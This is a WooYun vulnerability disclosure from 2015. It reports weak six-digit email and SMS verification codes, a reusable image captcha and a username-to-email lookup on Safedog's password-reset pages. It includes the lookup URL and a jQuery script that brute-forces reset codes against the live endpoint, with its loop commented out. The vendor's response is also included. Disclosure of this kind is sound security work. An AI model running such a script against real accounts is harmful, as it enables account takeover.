当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107262

漏洞标题:邮件验证码及短信验证码强度不够(可遍历用户邮箱)

相关厂商:安全狗

漏洞作者: 黑色雨滴

提交时间:2015-04-13 12:01

修复时间:2015-04-18 12:02

公开时间:2015-04-18 12:02

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:5

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

邮件验证码和短信验证码 是六位纯数字
存在暴力破解的可能。

详细说明:

这个链接可以查出用户名及对应的邮箱
http://passport.safedog.cn/redirect_to_mail_verify.html?userName=admin

1.png


(这地方感觉存在其他漏洞,还没测试,后面再说)
userName可以随便写,碰到谁就是谁。
知道用户名和邮箱后,从找回密码用邮箱找回。系统会发一个邮箱验证码到邮箱。
这时候就可以用下面代码来跑邮箱验证码了.

//补齐6位,左补0
function getVC(i){
	var i=i+'',s='';
	var c=6-i.length;
	if(c>0){
		for(var j=1;j<=c;j++){
			s+='0'
		}
	}
	return s+i;
}
// 这地方不能跑。 频率太高,被防火墙拦了。
//for(var i=0; i<99999;i++){
var data={userName:'用户名',
authorizeType:'2',
validateCode_img:'图片验证码',
//这个验证码 地址是http://passport.safedog.cn/image.html  
// 只要不手动刷新,就能一直用.不是只校验一次就过期的那种.
email:'邮箱',
validateCode:getVC(i)
};
$.ajax({url:'http://passport.safedog.cn/resetPwdAuthorize.html'
,data:data,method:'POST'
,success:function(data){
	if(data.indexOf('确认密码')!=-1){
		console.log(i);
		console.log(data);
//data 里面有个form 手动提交数据就能改了.
	}
}});
//}


水平有限,我没跑出成功的案例。但是这个地方肯定是可以突破的.
问题的关键点有三个地方:
1.http://passport.safedog.cn/redirect_to_mail_verify.html?userName= 这个地方暴漏了用户的邮箱.
2.图片验证码可以多次使用
3.邮箱验证码强度不够

漏洞证明:

见详细说明

修复方案:

版权声明:转载请注明来源 黑色雨滴@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-04-18 12:02

厂商回复:

最新状态:

2015-04-20:感谢提交漏洞,这次漏洞被忽略是之前管理的同事手误。之后的漏洞提交,我们会及时响应,并且给予正确的rank以及一些适当的奖励。手机验证码有时效性无法爆破。